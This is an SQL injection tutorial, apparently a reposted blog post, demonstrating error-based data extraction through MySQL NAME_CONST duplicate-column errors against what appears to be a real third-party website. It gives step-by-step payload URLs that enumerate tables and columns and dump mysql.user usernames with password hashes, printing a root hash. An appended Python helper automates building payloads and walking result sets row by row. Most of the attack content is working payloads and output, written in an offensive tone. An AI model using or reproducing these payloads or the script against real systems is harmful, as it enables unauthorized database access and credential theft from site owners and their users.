It's been a while since I've made an SQL injection tutorial, so I thought I'd make a new one using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to write a guide for it.
Related information
NAME_CONST() was added in MySQL 5.0.12, so it won't work on anything older than that.
Code: NAME_CONST(name, value)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants. That last sentence is the catch: on builds that enforce it, passing version() or a subquery as the name gives "Incorrect arguments to NAME_CONST" instead of the duplicate-column error this tutorial relies on, so whether the method works depends on the exact server build. The 5.0.27 target below accepts non-constant names.
Code: SELECT NAME_CONST('test', 1)
+------+
| test |
+------+
|    1 |
+------+
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.
Code: http://www.bkjia.com/qcwh/content/detail.php?id=330&sid=19&cid=261'
Code: +and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--+
VAR = the MySQL value you want: a function such as version(), user() or database(), or a server system variable written as @@name (for example @@datadir).
Why this leaks anything: the derived table gets two columns whose name is the value of VAR, MySQL refuses to build a derived table with duplicate column names, and the error message quotes the offending column name. As long as the application prints MySQL errors, the value lands on the page. End the URL with --+ rather than a bare --: MySQL only treats -- as a comment when whitespace follows it, and the + decodes to a space.
The names of the system variables are listed in the MySQL manual, section 5.1.3 "Server System Variables".
Let's try it out on my site...
Code: http://www.bkjia.com/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--+
Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting "invalid call to NAME_CONST" trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily they work here, so let's get this going again...
Data Extraction
Code: +and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--+
DATA = the column and table you want (for example table_name+from+information_schema.tables). The subquery is wrapped in its own parentheses inside NAME_CONST() and has to return exactly one row, which is what limit+0,1 is for; to read the next row change it to limit+1,1, then limit+2,1, and so on.
To confirm the target accepts a subquery as the name argument, try it with select+1 first. We should get a duplicate column '1' error...
Code: http://www.bkjia.com/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--+
Error: Duplicate column name '1'
Now let's get the tables out of this bitch...
Code: +and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--+
Let's see if it works here, if it does, we can go on and finish the job.
Code: http://www.bkjia.com/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--+
Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table ..
Code: +and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--+
0xHEX_OF_TABLENAME is the table name as a hex literal (user = 0x75736572), so the query needs no quote characters. If the same table name exists in more than one schema, add table_schema=0xHEX_OF_SCHEMA to the where clause as well, which is what I do for mysql.user next.
So mine looks like this, and I get the duplicate column name 'host'.
Code: http://www.bkjia.com/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--+
Error: Duplicate column name 'host'
Woot, time to finish this bitch off.
Code: +and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--+
concat_ws() joins the two columns into one string, so both values come back in a single error; 0x207e20 is the separator ' ~ ' as a hex literal.
So mine looks like this...
Code: http://www.bkjia.com/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--+
Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it: the User and Password columns of mysql.user, joined by ' ~ '. Thanks for reading.
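As an added example (not the original author's tooling and not code from this page), here is a small Python helper that automates the procedure above: it builds the NAME_CONST derived-table wrapper for either a bare expression such as version() or a LIMIT n,1 subquery, hex-encodes names so no quotes are needed, URL-encodes the payload including the whitespace the -- comment needs, and parses both "Duplicate column name" and "Incorrect arguments to NAME_CONST" out of the response. It walks a result set by stepping the LIMIT offset, which the tutorial does one row at a time by hand. The target URL, parameter value, demo table names and the responses returned by demo_fetch() are constructed for the demo; replace demo_fetch with a function that performs the HTTP request and returns the body.

```python
"""Build and decode MySQL NAME_CONST duplicate-column injection payloads.

Added example, not the original author's script. The target URL, parameter
value and the responses returned by demo_fetch() are constructed for the
demo; only the payload shape and the error texts come from the tutorial.
"""
import re
from typing import Callable, List, Optional, Tuple
from urllib.parse import quote_plus

DUP_RE = re.compile(r"Duplicate column name '([^']*)'")
WRONG_ARGS = "Incorrect arguments to NAME_CONST"  # MySQL's ER_WRONG_ARGUMENTS text


def hex_literal(s: str) -> str:
    """MySQL 0x... literal for s, so the injected query needs no quotes
    (hex_literal('mysql') == '0x6d7973716c')."""
    return "0x" + s.encode("utf-8").hex()


def name_const_wrapper(expr: str) -> str:
    """Put the value of expr into the name of two derived-table columns.

    MySQL refuses a derived table with duplicate column names and quotes
    the offending name, so the value of expr lands in the error message.
    The comment ends with a space because MySQL only honours '--' when
    whitespace follows it; quote_plus() turns that space into '+'.
    """
    return (
        f" and 1=(select * from (select NAME_CONST({expr},1),"
        f"NAME_CONST({expr},1)) as x)-- "
    )


def row_subquery(column_expr: str, table: str, where: Optional[str] = None,
                 offset: int = 0) -> str:
    """Single-row subquery; step offset to walk the result set row by row."""
    cond = f" where {where}" if where else ""
    return f"(select {column_expr} from {table}{cond} limit {offset},1)"


def build_url(base_with_param: str, original_value: str, payload: str) -> str:
    """Append the payload to the parameter's original value, URL-encoded."""
    return base_with_param + quote_plus(original_value + payload, safe="=()*,")


def parse_response(body: str) -> Tuple[Optional[str], Optional[str]]:
    """('dup', leaked_name) on success, ('wrong_args', None) when the build
    enforces NAME_CONST's constant-argument rule, (None, None) otherwise."""
    m = DUP_RE.search(body)
    if m:
        return "dup", m.group(1)
    if WRONG_ARGS in body:
        return "wrong_args", None
    return None, None


def extract_rows(fetch: Callable[[str], str], column_expr: str, table: str,
                 where: Optional[str] = None, max_rows: int = 64) -> List[str]:
    """Walk LIMIT n,1 until the server stops leaking a duplicate column.

    fetch(payload) must return the response body for one request. What a
    server answers once the offset runs past the last row varies between
    builds (assumption here: an empty or NULL name), so max_rows caps the
    walk regardless.
    """
    rows: List[str] = []
    for n in range(max_rows):
        kind, value = parse_response(
            fetch(name_const_wrapper(row_subquery(column_expr, table, where, n))))
        if kind == "wrong_args":
            raise RuntimeError("target enforces constant NAME_CONST arguments")
        if kind != "dup" or value in ("", "NULL"):
            break
        rows.append(value)
    return rows


# Constructed stand-in for the vulnerable page: it only reads the LIMIT
# offset out of the payload and answers the way the 5.0.27 target above did.
DEMO_URL = "http://target.example/detail.php?id="   # constructed
DEMO_TABLES = ["com_admanage", "com_demo_users"]    # constructed data


def demo_fetch(payload: str) -> str:
    n = int(re.search(r"limit (\d+),1", payload).group(1))
    if n < len(DEMO_TABLES):
        return f"<b>Error:</b> Duplicate column name '{DEMO_TABLES[n]}'"
    return "<html>page rendered normally, no SQL error</html>"


if __name__ == "__main__":
    print(build_url(DEMO_URL, "261", name_const_wrapper("version()")))
    print(extract_rows(demo_fetch, "table_name", "information_schema.tables",
                       "table_schema=database()"))
    creds = row_subquery("concat_ws(0x207e20,User,Password)", "mysql.user")
    print(build_url(DEMO_URL, "261", name_const_wrapper(creds)))
```

extract_rows() raises on "Incorrect arguments to NAME_CONST" rather than silently returning nothing, because that response means the build enforces the constant-argument rule and no amount of retrying will help; the parser also tolerates HTML around the error text, which is how the message usually arrives.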
From http://hi.baidu.com/evilrapper/blog/item/323702a10ff4009446106459.html